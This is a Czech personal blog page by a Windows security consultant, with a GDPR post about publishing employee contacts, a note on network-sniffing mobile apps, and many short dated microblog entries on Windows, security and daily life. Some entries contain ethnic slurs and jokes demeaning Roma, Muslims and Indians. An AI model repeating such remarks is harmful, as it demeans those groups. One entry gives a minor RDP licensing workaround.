  • konvertory mediálních formátů a úpravy fotek
  • komprimační a zálohovací programy
  • vytváření ISO a vypalování a grabování a hledání
  • optimalizace registrů, paměti, sítě, databází, odinstalery
  • zaručené ochrany před viry, popup-blockery atd.

Další bohatou referenci debility najdete na technetu. Nebo si dáte nějaké technické fórum a podíváte se, co admini potřebují.

A tohle není jen problém počítačů. Nedávno se kdosi chlubil, že má na mobilu 250 aplikací.

Mobil má možná ochranu proti nevyžádanému přístupu ke kontaktům a mailu a obrázkům, ale nemá žádnou ochranu proti nenápadnému připojení k síti. To tam přece chcete! Stačí aby se objevil ve vnitřní WiFi a tradá.

No a jako jednu neveřejnou funkci takový prográmek bude mít očuchávání sítě. A samozřejmě odesílání na příslušná místa.

A teď si odpovězte na otázku - jsem já snad první, koho to napadlo?

Jediná ochrana proti tomu je striktní AppLocker a nepouštět podivné programy do vnitřní sítě. A pokud dojdete na www.hackerfest.cz, Roman Kummel vám to ukáže v JavaScriptu.

srpen 24
GDPR a kontakty zaměstnanců na webu společnosti

Dostal jsem pěkný dotaz ohledně GDPR pohledu, tak na něho odpovím rovnou větším článečkem. Nejprve však disclaimer:

Toto není autoritativní právníkův pohled. Nejsem právník. I kdybych byl, tak by to nebylo autoritativní. Jediný, kdo je zodpovědný za implementaci GDPR je nejvyšší vedení společnosti (executive management, pokud se chceme vyjadřovat standardně). Toto vedení by si mělo přizvat svého vlastního právníka, který mu dá doporučení, jak a co. A jen ten právník může být potom zodpovědný za kvalitu svého doporučení. Tento článek je o tom, co si máte uvědomit a na co se toho svého právníka máte zeptat.

Narozdíl od technických informací, právní porady nejsou a nemohou být nikdy objektivní a absolutní. Právníci poskytují právní názory, ne zaručená fakta. Vím co chce GDPR, vím kde mám jaké údaje a vím tedy na co se mám zeptat právníka. To je vše co jsem já schopen poskytnout.

Dotaz

"... kontakty veřejně vystavené na našem webu, jak se k tomu GDPR postaví ? standardně tam máme jméno zaměstnance telefon, mail, pobočku ..."

Velmi pěkné, jednoduché a přitom se to dá parádně hnidopišsky rozpitvat :-)

Rozbor

Jméno zaměstnance je jeho osobně identifikovatelný údaj (personally identifiable information, PII), pomocí kterého je možné ve velkém procentu případů jednoznačně identifikovat konkrétní fyzickou osobu, tedy subjekt údajů (data subject). Fotografie samozřejmě.

Telefon a email bych zde přesněji vyjádřil jako firemní telefonní číslo a firemní emailovou adresu, aby se to odlišilo od trvalejšího osobního telefonního čísla a emailové adresy, kterou ti lidé používají pro svoje soukromé potřeby. Firemní telefonní číslo člověka už nebude identifikovat, až mu bude odebráno (propuštění, změna zařazení apod.). Firemní emailová adresa ho naopak identifikovat bude možná i nadále, protože je obvykle složena například jako jméno.příjmení. Minimálně však po dobu, kdy tyto údaje zaměstnanec využívá, i tyto ho tedy identifikují.

Pozdější identifikovatelnost (po tom, co člověk už zde nepracuje) nás i tak zajímá. Je možné, že údaje z webu ostraníme, jakmile zaměstnance odejde (nebo přejde na jinou pozici). Ale existují webové archivy, ve kterých stránky budou i nadále přístupné a to klidně navždy.

Rizika pro zaměstnance?

Každé zveřejnění osobních údajů s sebou přináší možná rizika pro daný subjekt údajů (fyzickou osobu). Možná to tak v tomto případě nevypadá, ale dokážu si představit, že někomu nemusí být příjemné být veřejně spojován s firmou, ve které pracuje. Sousedé závidí dobrou pozici, nebo se posmívají pozici jiné, nespokojení zákazníci si vás mohou najít a mstít se, nebo pomlouvat apod.

Jako u všech případů ochrany osobních údajů bude i zde 99.999% v pohodě a bez problémů. Ale aby se vám pak někdy nestalo, že vás nějaký naštvaný nefachčenko práskne na úřadě pro ochranu osobních údajů (UOOU). Pokud by se mu navíc stala nějaká újma, bude to ještě horší. Dokážu si představit, že vám nespokojený soused třeba posprejuje dveře. Takové věci se dějí.

Zpracování

Tím, že tyto osobní údaje zveřejníme a takto šíříme, je tedy zpracováváme (processing). Jsme tedy zpracovatelem.

My nejsme jen zpracovatelem, jsme správcem údajů, protože osoba (subjekt údajů) jedná přímo s námi a svoje údaje poskytuje přímo nám a my si zde určujeme účely zpracování. Údaje zpracováváme buď na základě souhlasu (consent) získaného od subjektu údajů, nebo třeba na základě jiného zákonného důvodu (titulu), nebo kvůli plnění smlouvy, kterou máme se subjektem údajů.

Zákonný důvod by mohl být například odesílání požadovaných osobních údajů zaměstnanců na správu sociálního zabezpečení kvůli důchodovému pojištění. To se nás zde evidentně netýká. Zákon, že musíte na webu zveřejnit kontakty zaměstnanců nejspíš nemáme.

Příklad plnění smlouvy mezi subjektem údajů a správcem údajů je třeba předání kontaktních údajů pošťákovi, pokud si u vás na e-shopu subjekt údajů něco objednal. Samozřejmě by mohlo být přímo v pracovní smlouvě, že se údaje zveřejňují na webu z důvodů, které jsou k výkonu práce přímo potřeba. Nebo by stačilo, kdyby to prostě bylo obecně známo, že k výkonu daného povolání je potřeba údaje zveřejnit. To by potom bylo plnění pracovní smlouvy. Ale to není naše situace.

Takže první otázka na právníka zní - nešlo by vymyslet nějaký takový "automatický" důvod, proč bychom mohli tyto osobní údaje tímto způsobem zakonně zpracovávat? Jinak totiž budeme potřebovat souhlas se zpracováním osobních údajů.

Souhlas

Souhlas si samozřejmě můžete vyžádat vždycky, ale je to možná větší administrativní zátěž. Navíc je problém s tím, že souhlas možná dnes nemáme, nebo nebyl ještě získán GDPR kompatibilně a s nástupem GDPR si ho budeme muset vyžádat znovu, nebo lépe. V případě vlastních zaměstnanců to snad personalisti zvládnou v pohodě, stejně tráví většinu času lelkováním na fb :-)

Souhlas musí být svobodný, daný, jednoznačný, informovaný a specifický. Informovaný znamená, že zaměstnanec bude muset přesně vědět čeho se to týká a co to pro něho znamená. Specifický znamená, že nemůžete napsat něco jako "souhlasím se zpracováním údajů". Místo toho musí souhlasit se zveřejněním údajů na webu společnosti, a to kterých konkrétně.

Protože musí být souhlas svobodný, tak je možné, aby to zaměstnanec odmítl. Nemůžeme ho za odmítnutí souhlasu, a to ani za jeho pozdější odvolání, například vyhodit z práce. Nejspíš byste ho mohli propustit jenom v případě, že bez kontaktů na internetu se jeho práce prostě vykonávat nedá. Ale to vám už zase může říct jedině váš vlastní právník.

Takže pokud ho potřebujete, s právníkem si ujasněte znění souhlasu. Právník vám také nejspíš řekne, že souhlas nemůže být přímo součástí pracovní smlouvy. Nejspíš na to budete muset mít samostatné formuláře.

Technicky se ujistěte, že jste schopni opravdu osobní údaje nezobrazovat, pokud to děláte nějak automaticky na základě dat v informačním systému společnosti. Stejně tak je musíte být schopni odstranit, když subjekt údajů svůj souhlas odvolá.

Technicky je také nutné, aby se souhlas dal odvolat stejným způsobem, jako byl udělen. To znamená, pokud člověk souhlasil na papíru, který řešil s presonalistou, měl by být personalista zase schopen nechat souhlas zrušit. Jestli máte souhlasné formuláře na nějakém interním zaměstnaneckém portále, mělo by jít souhlas stejnou cestou odebrat. Ne že jim to budete komplikovat a chtít po nich, aby se kvůli odvolání souhlasu dostavili osobně na sekretariát v cizím městě.

Zpracování v neGDPR prostředí

Máme tu ještě jeden problém. Co když máte web společnosti hostovaný u nějakého poskytovatele, který nespadá pod GDPR. Typicky USA nebo Čína například. Takový hoster je potom zpracovatelem osobních údajů, zatímco vy jste pořád jejich správci. Jako správci jste zodpovědní za bezpečnost osobních údajů.

Problém je, že osobní údaje takovému zpracovateli jen tak dát nesmíte. Samozřejmě můžete, ale musíte na to mít ještě dvakrát jasnější, pětkrát specifičtější a osmkrát informovanější souhlas, než normálně. Takže pozor!

1 - 14Next
 

 Rychlovky lepší než tvítr

 
9.4.2017 4:56
V Nemecku zacaly velikonocni prazdniny a proto je ve smeru do Srbska patnackilometrova fronta aut s nemeckou znackou. Evidentne vsichni jedou slavit velikonoce do turecka?
2.3.2017 6:13
ČD se rozhodly že pořádně naserou všechny stávající zákazníky a zrušily inkarty z eschop profilů. Zajděte si pro heslo na přepážku!
12.1.2017 14:29
https://www.root.cz/clanky/godaddy-vydal-8951-certifikatu-bez-spravneho-overeni
1.12.2016 12:43
jupíí, StartSSL už zase vydává!
22.11.2016 21:05
jak najít teď rychle jinej DNS server když nejede google? brýle se bez brýlí špatně hledají :-)
22.11.2016 11:03
dívám se, že můj hledač AES klíčů funguje i na zašifrované Word dokumenty: https://www.sevecek.com/Lists/Posts/Post.aspx?ID=583
7.11.2016 11:58
RTM Windows 2016 nabízí při instalaci DC hodnotu forest level "Windows Server Technical Preview". Tak to je opravdu luxus na RTM :-)
20.10.2016 20:34
čd opět předvádí, že mít WiFi ještě neznamená připojení do internetu. Ale jede hezky, jen co je pravda, nikdo moc nezatěžuje :-)
13.10.2016 5:54
aaa, už se stahuje Windows Server 2016 RTM :-)
6.10.2016 10:34
memorylíček ve službě Remote Registry. U jednoho zákazníka to poněkud vytuhlo DCčka po celé evropě: https://support.microsoft.com/en-gb/kb/3105719
27.6.2016 16:26
proč mě ten powershell pořád svádí psát místo operátoru -join operátor -joint ? :-)
14.6.2016 22:00
můj nový security bulletin MS16-081: https://technet.microsoft.com/library/security/mt674627.aspx Je to sice jenom DoS a jenom "important", ale stejně :-)
1.6.2016 6:53
Dorazilo mailem, díky: http://www.alexandreviot.net/2015/10/07/windows-10-change-network-bindings/
23.5.2016 23:54
zkontrolujte si, zda se vaše karta nenachází v databázi kradených karet: https://www.sevecek.com/UkradeneKarty/byla-vase-karta-ukradena.htm
23.5.2016 22:37
všude jsou seznamy kradených mailů. a důkaz? není to metoda, jak ukrást mail? škoda, že tam obvykle nemají "ověřit, zda bylo ukradeno heslo (kreditka)" :-)
20.5.2016 13:28
a naopak tohle se nezdá špatné: https://support.microsoft.com/en-us/kb/3125574
19.5.2016 10:18
přislo mailem od známého. Tak to je opravdu chyba jak sviňa https://support.microsoft.com/en-us/kb/3053711 Něco jako "if -like *user" then while (true).
17.5.2016 16:33
Tak jeden problém z přednášky vyřešen - TPM virtuální čipová karta - ono to nefunguje z RDP sešny. Na to jsem tam přece instaloval TeamViewer a pak jsem na to zapomněl. Jsem vůl.
6.5.2016 20:43
Bouchlo mi pivo ve vlaku. Bernard. Celej vonim. Mobil lepi. Sedacka lepi. Koberec cvachta.
29.4.2016 7:53
No konecne to je aspon dobra zprava: StartCom launches new StartAPI and StartPKI service
15.4.2016 11:41
Konecne bez hanby nahrada za Mamia pizzu - pizza pappi!
15.4.2016 8:15
IDOS mě právě našel spojení z Mendláku na Křížkovského autobusem 44 :-)
8.4.2016 18:46
Jimi finch mi píše: Fuck me tonight :-) spam nekdy i pobavi
11.3.2016 10:18
aktuální vývoj mého bezpečnostního objevu: "We have been able to reproduce your report and are planning to release a fix for it in June."
8.3.2016 20:43
chrome a firefox přestaly věřit SHA-1 certifikátům intermediate autorit. Tzn. už nejen koncovým certifikátům.
8.3.2016 18:34
SAP problém pomalého NTLM/Kerberos ověřování a přístupu z jednoho forestu do druhého přes forest trust, celkem čtyři domény, 30 000 uživatelů, 150 DC, 70 site. Vyřešeno za 2 hodiny pomocí offline práce v Network Monitor a ETL souboru. Jsem pořád dobrej. Podotýkám že zdarma po školení.
21.2.2016 9:58
VasekB mi poslal tuhle PowerShell parádičku: https://blogs.technet.microsoft.com/heyscriptingguy/2016/02/18/powertip-count-backwards-in-array/
10.2.2016 14:49
... ted přišel event z 13:51 :-)

10.2.2016 14:46
závěr přednášky na SCOM - nechytalo to události - a teď se dívám, že mám error "Event Log provider is 51 minutes behind in processing". Tak proto.
31.1.2016 9:53
jeden z mých posledních článků vyšel i na technetu: http://blogs.technet.com/b/technetczsk/archive/2016/01/28/bezpecnostni-auditovani-ve-windows-prihlasovaci-udalosti.aspx
26.1.2016 16:19
právě jsem objevil hack jako prase. z toho bude Security Bulletin. Nechte se překvapit!
14.1.2016 10:17
Office365 neboli Azure nedovoluje mezeru v hesle
12.1.2016 23:09
Novy kfc hogofogo grander - malo masa, tuha houska, a moc palivosti aby byl dojem najezeni
21.12.2015 18:35
Top kniha 2 - Zdenek Svarak...
21.12.2015 18:35
Top kniha v nabidce - Denicek bulimicky. ?? Bliju. Zase bliju. Dneska jenom bliju.
15.12.2015 15:40
hmmm, právě mi dorazil mail s nabídkou členství v "international association or professional women". Tak to beru! :-)
10.12.2015 23:23
Tri dny zpatky jsem se dival na vrchni prchni. A dneska jsem se v Kolkovne pral borce v bile kosili na jidlo a von to nebyl cisnik :-)
9.12.2015 11:18
Altair přišel s výhodnou nabídkou napsat pro IIS automatizaci certifikátů zadarmo z LetsEncrypt.org. Tak tomu se nedá odolat :-) Jdeme na to!
2.12.2015 8:16
indove - jsou uplne ztraceni, ale presto nadseni a zacinaji se ucit C# a PowerShell. Tady u nas by clovek na jejich mentalni urovni delal kopace a byl by spokojeny, ale oni jdou do toho!
27.11.2015 9:01
26.11.2015 18:36
veeeelmi dobre buchty na WUG Bratislava
21.11.2015 16:10
budu mít 4 free přednášky v příštích 3 týdnech - https://www.sevecek.com/Lists/Calendar/calendar.aspx
20.11.2015 8:19
tak jsem se rozsiril uz i na facebook: https://www.facebook.com/ondrej.sevecek.official
20.11.2015 8:19
vcera vysel Windows Server 2016 TP 4!
11.11.2015 8:51
paranoik :-) http://www.jenpromuze.cz/video/22081-tenhle-chlapik-ma-opravdu-epicke-heslo-na-svuj-telefon
11.11.2015 7:20
no konecne pridali do meho oblibeneho WinHEXu schopnost interpretovat VHD
9.11.2015 18:44
Nemuzu si pomoct, ale mekDonda ma ted uplne navykovej Maestro burgr a statkarske hranolky.
9.11.2015 12:53
expirace operacniho systemu? BSOD 0xC0000605: A component of the operating system has expired :-(
25.10.2015 7:43
Igam Ogam nejnesnesitelnejsi pohadka na svete
10.10.2015 10:34
Tak to je terno. AVG antivirus dela uz i zrychlovani PC a zarucene optimalizuje registry i pamet. Poslete mi 50 kopii, prosim!
8.10.2015 17:03
https://www.youtube.com/watch?v=mpg5CnagE9k
6.10.2015 18:16
Jeste jednou televize. 18-24 minuta: http://www.ceskatelevize.cz/porady/10659215431-online/315281381881003/
30.9.2015 13:04
sevecek plka v televizi, minuta 18:00: http://www.ceskatelevize.cz/ivysilani/10101491767-studio-ct24/215411058320929
18.9.2015 8:30
"...že peníze potřebuje hned a poslala odkaz na web, kde jsou převody nejrychlejší": http://finance.idnes.cz/nova-forma-phishingu-0r7-/viteze.aspx?c=A150917_064006_viteze_sov
3.9.2015 16:52
ha, se dívám, že v dubnu už skončil TMG mainstream support. Pomalu nám můj miláček odchází. Ale není všem dnům konec, to bude až 2020, takže ještě hodně síly.
1.9.2015 14:28
Lamb mango v restauraci Anapurna opet TOP
31.8.2015 9:01
Hackerfest uz za 29 dnu!
27.8.2015 17:37
no pěkně - Windows 10 - tiskárna Microsoft Print to PDF a BitLocker "Save recovery key to a file"

26.8.2015 8:47
RSATy na Windows 10 ke stažení: http://www.microsoft.com/en-us/download/details.aspx?id=45520
24.8.2015 8:14
pokus o odhlášení aukro spamlistu neuspěl - Internet Explorer has modified this page to help prevent cross-site scripting :-)
15.8.2015 9:49
Ano slibuji, ze na zaklade tolika zadosti prozkoumam a napisu taky neco k tomuhle clanku: http://aeronet.cz/news/analyza-windows-10-ve-svem-principu-jde-o-pouhy-terminal-na-sber-informaci-o-uzivateli-jeho-prstech-ocich-a-hlasu/
11.8.2015 18:43
Bezpecnostni incident prvni tridy. Jankuv bubinek z kapslovyho revolveru svitil na rentgenu jako vanocni stromecek :-)
6.8.2015 20:42
Ecofriendly handmade fairtrade biofood. Fekal.
29.7.2015 18:31
instalace win10 podle známého: http://www.cievo.sk/2015/07/31/upgrade-na-windows-10/
28.7.2015 14:30
Windows 10 entrpréza už se dounlouduje. Zajímalo by mě co jsou fíčrz on dymánd, je toho dalších 4GB
12.7.2015 13:13
Horda ciganu prijede do hotelu a recepcni se pta: "mate rezervaci?", "jsme snad indiani?"
5.7.2015 18:29
Lada s dennima. Stalin vedel, uz tenkrat
2.7.2015 22:32
skype for windows desktop je volitelná Windows 8.1 aktualizace. Tak to je maso.
2.7.2015 19:05
http://www.bbc.com/news/technology-33347866
2.7.2015 18:45
Plovarna v Edenu je plna cigosu. Az na to, ze to neni plovarna...
2.7.2015 12:48
jupi, Windows Server 2016 (build 10074) ma znovu DCPROMO pro unattended instalaci. Starsi build to nemel, tak me to trosku rozesmutnilo.
27.6.2015 20:49
Reacher je dneska zase sama perla :-)
15.6.2015 17:09
panebože. Tak to nejde. Oni opravdu udělali verzi Windows 10 jako: 10.0. Takže polovina programů nepojede, protože bude třídit verze podle abecedy. To je nápad hodný idiota.
14.6.2015 12:23
Za vcerejsek build HyperV "clusteru", a migrace 2x DC, 2x CA, 2x NPS a 2x DHCP z 2008 zelez na 2012r2 virtualky. Jsem vcelku rychlej.
10.6.2015 19:32
Nasemu otci nefunguje Microsoft, manzelce nejede internet (rozumnej Seznam) a dozvidam se ze komusi zavedli na chalupu google :-)
20.5.2015 8:08

Jůlin překladový slovník: ďáďa - Honzík, mamn - maminka, tata - fotr, papn - papat, kakn - kakat. Ukazuje se, že je to celkem dostatečná slovní zásoba.

18.5.2015 15:55

dneska super publikum na #TechEdDevCon! dekuju!

18.5.2015 7:20
Dneska zas slunce a TechEd, nemuze byt nic lepsiho!
17.5.2015 22:06

panebože, ten nový build Windows Server 2016 neobsahuje nabídku Start? Ježiš!

17.5.2015 18:35
Slunko a sestiletel chlapecek na ulici zpiva ceskou hymnu. Kraasa
14.5.2015 10:56
Konference TechEd 2015 je narvaná k prasknutí! To bude něco! Už se nemůžu dočkat.
29.4.2015 6:07
MS planuje tarif pro duchodce. Azure Geront Plan. VM jenom s jednim CPU 300MHz, guest OS WinXP a Office365 ve skinu Outlook 97.
28.4.2015 16:22
diky VasekB za seznam :-) http://en.wikipedia.org/wiki/List_of_fictional_Microsoft_companies
17.4.2015 11:49
hustěéé, nějaký spammer dokázal prorazit moji "ochranu" s číslem 2 při komentování u mě na webu.
17.4.2015 7:37
Ostravaka nemusim ale dnesni song o treninku u ruzicky - se smeju jeste ted
16.4.2015 7:45
TechEd 2015 se nezadržitelně blíží. Už jenom měsíc do mé milované jarní konference. Nevím proč, ale ta atmosféra je prostě úžasná! https://www.teched.cz
9.4.2015 17:21
Certifikační zkoušky MCP vyžadují po několika letech recertifikaci. Odteď nemusíte jít znovu na zkoušku, stačí projí (jen) několik (mnoho) MVA kurzů.
8.4.2015 11:47
příští týden mám WUG Bratislava - PowerShell pro pokročilé. Tak doražte! http://www.wug.sk/?name=events&e=179
7.4.2015 20:57
teamviewer? neexistuje čistá verze "client". všechno si to automaticky zapíná vzdálený přístup, který nelze vypnout. tomu říkám bezpečnost.
4.4.2015 15:06
Kostkovy cukr - nejvhodnejsi bomboniera pro tchyni
1.4.2015 16:25
Congratulations 2015 Microsoft MVP!
28.3.2015 19:22
No proc? Vsichni turci, kosovci, makedoci atd z Nemecka a Rakouska maji pres velikonoce dovcu, tak jedou domu.
28.3.2015 19:22
Luxus trihvezdickovy hotel. Kuracky pokoj. Zadna wifi ani placena. Sprcha dela potopu. Nevim jestli neni lepsi prespat v aute.
28.3.2015 19:22
Prvni report z Belehradu. Spis z cesty. Dalnica zkrz Madarsko narvana  D a A auty. Proc asi?
14.3.2015 23:54
Ja to rikam porad, ze ty antiviry jsou zmagorenci. Vic udalosti na support, nez pozitivnich zasahu: http://m.bbc.com/news/technology-31851125
12.3.2015 16:47
Ja mam clanek na technetu a ani o tom nevim :-) http://blogs.technet.com/b/technetczsk/archive/2015/02/16/architektura-overovani-v-systemech-windows-a-rizika-z-toho-plynouci.aspx
10.3.2015 15:24
hrubus megakrutus: http://www.zive.cz/bleskovky/google-vyvinul-unikatni-experimentalni-virus-vyuziva-fyziku-modulu-ram/sc-4-a-177470/default.aspx
9.3.2015 17:40
zajímavá aktualizace: https://support.microsoft.com/kb/3004375?wa=wsignin1.0 . Zvlášť z pohledu toho, že dřív to logovalo jenom PowerShell.exe a nebyly k tomu parametry :-)
4.3.2015 8:20
Ctyri sojky na jednom strome
3.3.2015 13:42
zajímavé postřehy ohledně bezpečnosti Apple: http://www.root.cz/clanky/postrehy-z-bezpecnosti-podvodne-e-maily-este-nedali-posledne-slovo/
2.3.2015 13:51
už mi víckrát vrtalo hlavou, jak se dostat k heslům NPS RADIUS klientů - tak jsem si to přidal do komentáře https://www.sevecek.com/Lists/Posts/Post.aspx?ID=357
12.2.2015 19:16
Jestli budeš zlobit, tak tě odvezu do Norska a dám ti na ulici před sociálkou na zadek!
12.2.2015 7:45
Antiviry na mou ranni prednasku se uz instaluji. Dneska mame Avast, Eset a Symantec. Avg nesla stahnout trialka :-)
10.2.2015 15:10
Tak to je parada - jakoze si udelam z Azuru VPN primo do firmy, aby kazdej  Ind co to spravuje mel pristup primo k nam domu :-)
9.2.2015 7:05
Vikendovy pobyt na chalupe se zmenil na poblit. Ooo boze. Je to hnus vasnosti.
7.2.2015 10:47
Vcera vecer na parkingu pred McDonaldem muj milacek Janek poblil meho milacka auto a ja to ted drhnu. Fuj :-)
2.2.2015 21:46
to jsou idioti. MS zrušil "remote control" na RDP ve Windows 2012, aby se to zase vrátilo pod názvem "shadowing" ve Windows 2012 R2. panebože
31.1.2015 14:00
Hlazeni rejnoku kteri zerou z ruky tak to je paraaada. Zoo Lesna Zlin!
30.1.2015 21:19
hej more, zuno lezbank (aneb "zuno, less bank, more life")
29.1.2015 23:25
dívám se, že včera mi vyšel článek na technetu: http://blogs.technet.com/b/technetczsk/archive/2015/01/29/co-skutecne-znamenaji-jednotliva-uzivatelska-prava-aneb-ceho-se-bat-a-ceho-ne.aspx
26.1.2015 6:20
Bankomat nejel. Zadny prachy, zadny kafe. Umiram
23.1.2015 19:24
aktualizoval jsem svuj volatile forensics script - ted to audituje i certifikáty, lépe to překládá SIDy přihlášených uživatelů a používá to svůj vlastní Temp. https://www.sevecek.com/files/volatileForensics. Sice to nejsou úplně prchavé informace, dají se samozřejmě zjistit později i z imidže, ale i tak není špatné to slíznout rovnou.
23.1.2015 13:12
dejte si do google obrázků "my new credit card". Ti lidi musí být úplní magoři :-)
22.1.2015 7:06
Tak znovu. Kde je NEuspornost normalni zarovky? Co vytopim zarovkama usetrim na topeni. Stoji zlomek a SVITI!
16.1.2015 8:48
Přednáška o Kerberos, už příští týden na WUG Bratislava v GOPASu od 17 hodin: http://www.wug.sk/?name=events&e=172
16.1.2015 8:44
plazi se slimaci a potkaj tretiho. ten ma vestu s trhavinou, v jedny ruce granat a v druhy odpalovaci zarizeni. ty dva na nej koukaj a povidaj: a ty ses kdo ? a on odpovi: ja sem muslimak
15.1.2015 13:57
zdroják všech mých PowerShell kódů, pokud vynechám občasné maličkosti, právě dosáhl 25112 řádků včetně poznámek. Nepočítám prázdné řádky.
13.1.2015 8:39
Tri volavky? v letu, paráda
12.1.2015 17:11
no nechápu proč je na myši nastaveno ve výchozím stavu "Allow this device to wake up computer". Obvykle to vypínám potom, co se mě natvrdo po cestě vybije noťas.
9.1.2015 11:16
To jsem nevěděl, že PowerShell validace paremetrů v klauzuli Param() platí pro tu proměnnou i nadále uvnitř dalšího kódu. (Get-Variable $vstup).attributes.
7.1.2015 18:32
dneska spam - že prý "splňte si předsevzetí začít pracovat efektivně už v lednu"? Jakože "jsem línej lempl, tak třeba mě někdo poradí, jak se toho zbavit"? :-) Ale rovnou jsem to smazal, tak nevím.
7.1.2015 15:21
CD se posouvaji do dalsi dimenze. Jidelnicek RailJet: dva parky plus rohlik = 153 CZK, jeden kynuty knedlik = 185 CZK
22.12.2014 8:25
"Dnes mají rodiče největší obavy z toho, co jejich syn stahuje z Internetu a co jejich dcera na Internet nahrává."
18.12.2014 14:42
No hned si valím nainstalovat tenhle kazič stability a výkonu. To stojí za to: http://www.zive.cz/bleskovky/viber-se-pustil-do-esetu-ten-mu-to-spocital-na-twitteru/sc-4-a-176542/default.aspx
2.12.2014 6:13
Windows 8.1 se nasilne restartnou po aktualizacich, kdyz to dlouho neudelate sami, jak jsem prave zazil :-) Ale zase potom pospousti vsechny predchozi program.
29.11.2014 11:48
Znamy po me chtel nastaveni sites v IE pres GPO. https://www.sevecek.com/Lists/Posts/Post.aspx?ID=411
28.11.2014 11:40
Ve stredu 17.12. budu mit WUG na tema Kerberos! https://www.sevecek.com/Lists/Calendar/DispForm.aspx?ID=54
27.11.2014 11:51
McDonald zrusil smazak???!!!
26.11.2014 18:07
Linux? Navic s ceskou klavesnici?
21.11.2014 19:34
Byl jsem v pondeli na Interstellar.Dost me desilo tech 170 minut,ale super!Nadherne cizi planety.A ten motiv rodice me vcelku vzal.
19.11.2014 8:40
Panebozeee, lsass.exe 1000 hardfaults/sec, 10GB commit. Co to jeee? Uz poslednich 5 minuuuut!
19.11.2014 6:47
Windows 8.1. pravým tlačítkem na taskbar - Properties, záložka Navigation, Replace CMD with PowerShell in the Win+X menu
18.11.2014 4:32
Odinstalace Gugle Chrome prave zrychlila pocitac cca 3x. Tolik ke kvalitam techhle nesmyslu.
13.11.2014 19:55
Windows Experience Index na Windows 8.1 - winsat prepop, gwmi win32_winsat
13.11.2014 19:18
na Windows 8.1 neni Windows Experience Index? Na Windows 8 ho jeste mam
12.11.2014 10:21
a to není žádná sranda - to je každý web server, RDPčko, TMG i DCčko přes LDAPS, nebo Exchange!
12.11.2014 10:16
pekelná chyba: https://technet.microsoft.com/library/security/ms14-066
5.11.2014 19:59
tohle moc lidí nezná - průzkumník - nějaký soubor nebo složka - shift+pravé tlačítko - Copy as path
1.11.2014 14:06
Jankova dnesni hlaska - a co to jako bude za slavu, ze si musim vzit tyhle hezci teplaky?
30.10.2014 20:18
Po pekelne hejtickem dnu na pivu s Pepou Dvorakem. Teda bavi se s zenskejma a ne se mnou :-)
27.10.2014 7:43
Ctyri sojky u vrsovickeho nadrazi!
25.10.2014 9:56
zajimalo by me, proc ma Java zapotrebi vsude otravovat s tim podivnym Ask toolbarem?
23.10.2014 17:30
Bratr mel pravdu, plisnove syry maji projimave ucinky
17.10.2014 18:19
CHFI: Computer Hacking Forensic Investigator!!!
17.10.2014 12:59
zdá se, že na jakémkoliv telefonu jde zjistit IMEI zavoláním na *#06# to je zajímavé.
17.10.2014 12:56
dnešní fyzikální okénko: http://palkovsky.blog.idnes.cz/c/196273/Rychlosti-se-nescitaji.html
14.10.2014 22:01
tak soft restart na Windows 10 server asi nefunguje - nebo to chce nejakou hw podporu?
13.10.2014 18:58
Prave jsem dostal na googlu kapcu "debil".
12.10.2014 14:04
Napeti pred konferencemi #hackerfest a msfest vrcholi! Uz za tyden!
10.10.2014 19:44
http://status.modern.ie
9.10.2014 13:36
na RDP terminal se da jit bez licence, kdyz nejede licencni server, nebo nechcete konzumovat licenci – staci do MSTSC klienta zadat do adresy /admin
9.10.2014 13:33
Windows 2012 based Remote Desktop Session Host (RDP session host) error: The remote session has been disconnected because there are no Remote Desktop License Servers available to provide a license. Hotfix download: http://support2.microsoft.com/kb/2916846
9.10.2014 13:03
Dva ucty se stejnym heslem - bacha. Kdyz zjistim jedno heslo, rovnou ho zkusit na vsechny ostatni ucty je hracka. Bez zamknuti!

7.10.2014 13:33
a máme tu program mých 4 přednášek na konferenci http://www.ms-fest.cz, která proběhne 19.10 v Brně!
2.10.2014 23:37
Na serverech 10 je něco, co se jmenuje "Windows Volume Replication". Jestli to je synchronní replikace, tak paráááda!
2.10.2014 22:45
aha, takže ovladač na disketu ve Windows 10 není ani po instalaci. Tak ne že bych to potřeboval na železe, ale potřebuju to pro Hyper-V virtuálky a autounattend.xml.
2.10.2014 21:29
windows 10 nemají v instalačce ovladač na disketu? ach bože.
2.10.2014 19:37
konference HackerFest už v pondělí 20.10. http://www.hackerfest.cz
2.10.2014 19:34
... a když to je kratší než 140 znaků, tak k tomu není link na twitteru. Jsem dobrej!
2.10.2014 19:23
Mám nový automatický re-tweeter pro SharePoint. To je božíííííííí. Cokoliv hodím do SharePointu se mi automaticky přepošle na twitter. Konečně jsem to dodělal.
1.10.2014 18:43
Uz se stahuje Windows 10 Enterprise Preview!
1.10.2014 7:54
Jo taaak Windows 10? Kam to cislovani asi povede?
30.9.2014 18:25
Zitra vecer se tesim na predstaveni Windows 9 pro MVPiky! Snad budu moct neco uverejnit i tady!
26.9.2014 11:46
dneska jsem vymyslel optimální český překlad pro failover cluster - přepadový chuchvalec.
4.9.2014 19:14
Euforie z Office365 podporu! Nemuzu si pomoct, ale musim vyjadrit obrovske nadseni z borcu z podpory na Office365. Ne ze by me pomohli :-) ale snazi se a jsou velmi ochotni. Diky do Svedska!
4.9.2014 8:29

vsechny Windows Live ucty zamknuty? Ze by mel MS nervy z celebrit?

1.9.2014 18:09

Ubytování v Ostravě za 1400,- na 4 noci s kabelovým internetem 6 MB, vlastní pokoj velmi nově opravený a zařízený, s kuchyňkou a sociálkou. Panebože!!! To je skoro lepší se sem úplně přestěhovat!

 

22.8.2014 4:40
Dekuji vsem za prizpevky a komentare!
20.8.2014 12:37
Zda se, ze instalace DC 2012+ dela kontrolu ostatnich DC pomoci WMI
18.8.2014 20:13
Dneska alza reklama - dum a auto si zamykate, tak proc si nechranite pocitac antivirem?

Na to meje odpoved - protoze tam mam antivirus od MS, ktery funguje stejne jako zamek doma a od auta - neznici vam motor, nezpomalǔi vam auto trikrat a chaoticky neblika levym a pravym blinkrem a nebrzdi ve stopadesatce znicehoz nic
12.8.2014 10:09
dneska jedna zajímavost - tu u zákazníka zmizel na DC po výpadku proudu primární DNS suffix. Prostě to bylo najednou bez suffixu. Co se stalo ve skutečnosti je, že zmizel klíč z registrů - HKLM\System\CurrentControlSet\Services\TcpIp\Parameters, hodnota "NV Domain". Tak jsem to nastavil znovu ručně a už to funguje. Divnost nad divnost.

11.8.2014 12:01
je škoda, že nejde zvýšit karmu víckrát, než jenom jednou:
http://vetvicka.blog.idnes.cz/c/421436/Zastavte-Putina-dokud-je-cas.html
15.7.2014 20:07
